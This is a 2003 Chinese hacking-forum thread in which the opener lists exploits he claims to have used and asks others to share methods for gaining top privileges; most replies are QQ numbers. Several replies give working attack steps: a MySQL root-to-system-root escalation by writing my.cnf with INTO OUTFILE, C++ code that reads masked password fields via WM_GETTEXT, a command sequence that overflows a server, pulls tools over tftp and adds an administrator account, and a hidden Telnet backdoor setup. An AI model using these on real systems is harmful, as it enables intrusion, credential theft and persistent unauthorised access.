黑客入侵手法与技术的讨论!(我希望大家的加入.)
首先说明:
我并没有高明的黑客入侵手法.在这里只是希望能和大家交流一下.
我知道并已经实施的手法:
98 -----------ICMP蓝屏死机.属于拒绝服务类
-----------NETBIOS的完全共享密码破解.
2000SP1-------3389输入法漏洞.
2000SP2-------IDA/IDQ/UNICODE/ASP
-------本地提升权限的IDQ.DLL
2000SP3-------WEBDAV
-------RPC LOCATE
-------MEDIA
2000SP4/XP/2003
-------RPCDCOM
FONTPAGE2000
------资源管理与路径泄漏.
SQL2000-------SA的空口令.
-------SQL2的溢出.
LINUX -------SECLPT/SAMBA/DHCP/KMOD/STATDX
大概只有这么多.不要笑我.(我对WEB方面的入侵手段不了解)
我非常想知道大家所熟悉的一些入侵手法.
当然这并不包括,我刚才列出来的.我想大家知道每天的漏洞虽多.
但可利用并取得最高权限的溢出并不多.
所以在这里希望大家把自己曾经使用并成功夺得最高权限的手段供献出来一起分享.
我的QQ:21488275.
EMAIL:newhitler@163.com
欢迎大家交流.
问题点数:0、回复次数:56Top
1 楼AsmLinux(小阔)回复于 2003-11-03 02:35:42 得分 0
另外说一下,如果没有新的攻击手段,请帮我UP一下.
因为我觉得大家会对这个问题十分感兴趣. :)
也希望各位大虾能够说的详细一些.
谢谢!!!Top
2 楼zhiqiu(http://www.bsdlover.cn(找兼职,谁有需求?))回复于 2003-11-03 07:54:09 得分 0
这个想法不错,关注一下Top
3 楼spark_li(晕忽忽(恶人谷:通讯连长))回复于 2003-11-03 08:11:34 得分 0
哈,这个想法倒是不错的,
你所知道的都是面上流行得不能在流行的了。
Top
4 楼shixianyong(钱途无量)回复于 2003-11-03 08:57:56 得分 0
upTop
5 楼nail63547188(叶子落了)回复于 2003-11-03 10:32:00 得分 0
我也感兴趣,值得关注,UP.若对网络安全方面感兴趣的朋友加我.QQ:63547188Top
6 楼sungod8(琤) (Heros Ⅲ 凤凰)回复于 2003-11-03 11:38:21 得分 0
建议哪位哥们在QQ里开个群,大家来讨论一下!
QQ:277244467
楼主是个有心人啊!!
支持!!
Top
7 楼baola(★★★横冲直撞的短腿小黑猪★★★)回复于 2003-11-03 11:42:24 得分 0
up
Top
8 楼yangyongfu01321(杨永福)回复于 2003-11-03 12:09:59 得分 0
好我会的请加我我是一名中专学生还有很多不懂请你们把我的QQ给加上好吗我门可以共同探讨问题我的QQ是81719316Top
9 楼Hilltown(希尔)回复于 2003-11-03 12:34:18 得分 0
我的QQ:187213273Top
10 楼Youegin(我是一只小鲨鱼)回复于 2003-11-03 16:10:44 得分 0
那就一起开个群吧.
我的是:37536553Top
11 楼ckhitler(ckhitler)回复于 2003-11-03 20:11:12 得分 0
upTop
12 楼304040332522(贫如洗)回复于 2003-11-04 09:18:37 得分 0
我的qq 13273521
Top
13 楼l80d(无悔浪子)回复于 2003-11-04 10:33:37 得分 0
QQ:2530944
UPTop
14 楼smalllove(小爱)回复于 2003-11-04 10:58:43 得分 0
QQ:17982992Top
15 楼luckufo(军)回复于 2003-11-04 11:19:59 得分 0
ipc$ 3389Top
16 楼glgeneral(挪威的森林)回复于 2003-11-04 12:59:32 得分 0
QQ18963143Top
17 楼2003hxb(含冰)回复于 2003-11-04 18:50:53 得分 0
qq:282345392Top
18 楼knife_s(十年生死两茫茫,不思量,自难忘)回复于 2003-11-04 18:55:16 得分 0
QQ:691415 期待Top
19 楼LiJxin(黎叔)回复于 2003-11-04 19:11:05 得分 0
加我呀,QQ:120923173Top
20 楼sungod8(琤) (Heros Ⅲ 凤凰)回复于 2003-11-04 20:43:18 得分 0
那个哥们QQ会员的开群啊,都加我没有用啊,我不是会员!!
能开的那个帐户也用掉了,TNND腾讯就许开两个!!
Top
21 楼lym1314(一枝梅)回复于 2003-11-06 16:46:56 得分 0
我的啊287627086
一定加啊Top
22 楼ckhitler(ckhitler)回复于 2003-11-06 19:58:43 得分 0
upTop
23 楼maixiongyi(※雨尘※)回复于 2003-11-06 20:09:30 得分 0
开个群吧,我们大家一起来研究.别忘了加我一份哦.我的QQ:282020483Top
24 楼tmsqf(单身◎s)回复于 2003-11-06 20:55:10 得分 0
搞笑,呵呵Top
25 楼li_li_li(粒粒)回复于 2003-11-06 22:07:18 得分 0
加我一个,qq13743015Top
26 楼smalllove(小爱)回复于 2003-11-07 00:44:35 得分 0
有没有人开个群呀,大家一起练习交流下吗!共同进步呀!Top
27 楼jxhxf(网飘一剑)回复于 2003-11-07 09:26:31 得分 0
31660530Top
28 楼woki(流星)回复于 2003-11-07 11:27:34 得分 0
1943335Top
29 楼ybhsq(一剑飘尘)回复于 2003-11-07 11:37:27 得分 0
251475400凑凑热闹。Top
30 楼fewind2100(铁风)回复于 2003-11-07 12:30:00 得分 0
我也凑凑热闹
173623132Top
31 楼Harry88(小炬)回复于 2003-11-07 13:07:40 得分 0
算我一个,87576113Top
32 楼woshirenyi(去他妈的诺言)回复于 2003-11-07 13:31:24 得分 0
我的:14795408 :)Top
33 楼easyboot(易宝)回复于 2003-11-07 22:31:31 得分 0
那位建个群啥
这样大家交流起来多好呀Top
34 楼easyboot(易宝)回复于 2003-11-07 22:32:36 得分 0
哦
大家可以加入这个群1394958Top
35 楼sufon(是网不是站)回复于 2003-11-08 12:45:01 得分 0
88024176Top
36 楼acd123456(低智商野蛮人)回复于 2003-11-08 13:52:09 得分 0
71238204Top
37 楼rockypan()回复于 2003-11-08 14:18:12 得分 0
想学黑客技术的人真多呀Top
38 楼materials(金子,还是点石成金的手指?)回复于 2003-11-08 14:36:43 得分 0
来错地方了,想做黑客就要不断的学习、实践、交流、就是这样了,推荐大家去有名的黑客网站去看看。
CSDN与Microsoft有合作关系,在朋友的朋友面前揭朋友的伤疤,好吗?
换个地方吧。Top
39 楼gruse(软件新生代)回复于 2003-11-08 15:03:58 得分 0
先学学MCSE的课程吧!Top
40 楼gruse(软件新生代)回复于 2003-11-08 15:06:47 得分 0
MySQL ROOT用户可得到系统ROOT权限
在 /etc 目录下有 my.cnf的情况下,通过以下操作,可让mysqld在重新启动之后以ROOT身份运行,
用mysql root连接并输入如下命令:
mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack VALUES ('[mysqld]');
mysql>INSERT IN hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT
这样便在mysql的数据目录创建一个含有下面内容的文件my.cnf
[mysqld]
user=root
在mysql重起之后,此文件将覆盖 /etc/my.cnf的内容,mysqld将以root身份运行,这意味着你也同时拥有系统的root权限了,如通过使用创建适当形式的数据表并通过 INTO OUTFILE 创建或改写目标主机上任意文件等
Top
41 楼yan4234043(自行车)回复于 2003-11-08 15:18:11 得分 0
我刚刚学习编程,没有技术,如果您肯帮帮我,就请加我吧!!
一些攻击的小秘密,能告诉我吗??
QQ:94041358
对了我做了一个恶意的计算器,想要的找我!
Top
42 楼gruse(软件新生代)回复于 2003-11-08 15:21:47 得分 0
黑客非法探取密码的原理
一、非法获取Password的原理:
Edit控件是Windows的一个标准控件,当把其Password属性设为True时,就会将输入的内容屏蔽为星号,从而达到保护的目的。虽然我们看来都是星号,但程序中的Edit控件实际仍是用户输入的密码,应用程序可以获取该控件中的密码,其他应用程序也可以通过向其发送WM_GETTEXT或EM_GETLINE消息来获取Edit控件中的内容。黑客程序正是利用Edit控件的这个特性,当发现当前探测的窗口是Edit控件并且具有ES_PASSWORD属性时,则通过SendMessage向此窗口发送WM_GETTEXT或EM_GETLINE消息,这样Edit框中的内容就一目了然了。
二、黑客软件工作方法
首先要取得当前的窗口,并判断是否是Edit控件,一般多通过鼠标来指定要探测的窗口,例如在WM_MOUSEMOVE消息的响应函数中进行判断,现列举代码片段如下:
//将客户坐标转换成屏幕坐标
ClientToScreen(&point);
//返回一个包含指定屏幕坐标点的窗口
CWnd* pWnd = CWnd::WindowFromPoint(point);
if (pWnd)
{
//获取窗口句柄
HWND hwndCurr = pWnd->GetSafeHwnd();
if ((::GetWindowThreadProcessId (GetSafeHwnd(), NULL)) != (::GetWindowThreadProcessId (hwndCurr, NULL)))
{
char lpClassName[255];
//获取类名
if (::GetClassName(hwndCurr, lpClassName, 255))
{
//判断是否是Edit控件
if (0 == m_strWndClass.CompareNoCase("EDIT"))
{
//获取窗口风格
LONG lStyle = ::GetWindowLong(hwndCurr, GWL_STYLE);
//如果设置了ES_PASSWORD属性
if (lStyle & ES_PASSWORD)
{
char szText[255];
//通过掌握的句柄hwndCurr向此控件发送WM_GETTEXT消息
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText); //密码已保存在szText中
m_strPassword = szText;
}
}
}
}
}
上述代码中值得注意的有以下几个关键地方:
ClientToScreen(&point);
CWnd* pWnd = CWnd::WindowFromPoint(point);
HWND hwndCurr = pWnd->GetSafeHwnd();
这三句代码可以获取当前鼠标位置所在窗口的窗口句柄,在SendMessage中要用到的。
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);
这便是真正起作用的SendMessage了,其第一个参数指定了要接收消息的窗口句柄,我们已经通过上面的代码获取到了,第二个参数就是让Edit控件返回字符的WM_GETTEXT消息了,并将得到的内容保存在szText中。
Top
43 楼ckhitler(ckhitler)回复于 2003-11-08 15:50:31 得分 0
好.十分感谢gruse(软件新生代).
有建树的回贴.其实我就想让大家把熟悉的技术贴上来.
我也知道,在中国安全焦点和绿盟在技术上是领先的.但人气不旺,水平也高低不平.
真正对内核级入侵技术的人并不多.而且也不愿意把成功的溢出代码粘出来.
这正是所谓的技术封锁.但这也无可厚非.
最后还是感谢大家的回贴.如果有时间的话安全焦点还是个不错的好地方.Top
44 楼yikexing()回复于 2003-11-08 16:45:10 得分 0
我是网络爱好者,
加我的,93763643Top
45 楼luoy3551(传佩)回复于 2003-11-08 17:51:42 得分 0
up
35516855Top
46 楼sungod8(琤) (Heros Ⅲ 凤凰)回复于 2003-11-08 18:02:06 得分 0
参考:
http://expert.csdn.net/Expert/topic/2234/2234220.xml?temp=.2908899
Top
47 楼zhjq2002(牛牛)回复于 2003-11-08 19:46:53 得分 0
加我一个把 286778376Top
48 楼syman815(蓝魔)回复于 2003-11-08 20:24:57 得分 0
网络攻击——ASP漏洞权限
工具:aspcode.exe、winwmiex.exe、tftpd32.exe、runasX.exe、ispc.exe和idq.dll
步骤:
1、 溢出实验:C:\>aspcode
2、 验证权限:C:\>net user chengang chengang /add
3、 是否可写:C:\>echo aaa>aaa.bat
4、 上传文件:C:\>tftp -i ip get winwmiex.exe
5、 本地溢出:C:\>winwmiex.exe
6、 本地溢出:C:\>runasX.exe
7、 上传文件:C:\>tftp -i ip get idq.dll
8、 本地溢出:C:\>ispc ip/cscripts/idq.dll
9、 验证权限:C:\>net user chengang chengang /add
C:\>net localgroup administrators chengang /addTop
49 楼syman815(蓝魔)回复于 2003-11-08 20:27:46 得分 0
网络攻击后门——Telnet后门
现在,Windows2000的漏洞很多,入侵一个Windows机器相对容易,想保留果实有很多的办法。建立后门就是很常见的手段。利用Windows2000自身的Telnet就很简单,当然要经过加工,不然就很容易被看出来。
步骤如下:
(1) 去掉ntlm认证,(2) 可以改注册表,(3) 也可以利用ntlm.exe
(4) 将Telnet服(5) 务以其他服(6) 务的形式打开,(7) 用nt工具箱中的instsrv.exe
(8) 改Telnet服(9) 务的端口,(10) 利用tlntadmn.exe
步骤一中改注册表是将:
hkey_local_machine\software\microsoft\telnetserver\1.0\ntlm键值由Ox00000002变成1或0。
0——代表不使用ntlm身份验证,而使用输入用户明/密码的身份验证。
1——代表先尝试ntlm身份验证,如果失败,而使用用户名/密码的方式进行验证。
2——代表只使用ntlm身份验证。
步骤二将telnet以SystemTime服务来运行,改成你能Top
50 楼Qlike(℡鱼儿)回复于 2003-11-08 20:47:31 得分 0
路过这里。。。。Top
51 楼luoluonet(螺螺.net)回复于 2003-11-09 13:49:50 得分 0
各种cgi程序才是最主要的突破口~
比如sql - injection~Top
52 楼floodsynpass(天若有情)回复于 2003-11-09 19:37:26 得分 0
http://www.realhack.orgTop
53 楼nail63547188(叶子落了)回复于 2003-11-26 15:50:26 得分 0
upTop
54 楼guohf2000(雨叶)回复于 2004-01-02 22:08:03 得分 0
1538866
可以加我。我的群是:988542Top
55 楼galaxypilot(舵手)回复于 2004-01-03 01:17:31 得分 0
群:748053
本人现在不常上网,为方便各位朋友开了一个群,加入时自动通过!Top
56 楼yumengch(雨梦)回复于 2004-01-03 10:54:35 得分 0
哈哈Top
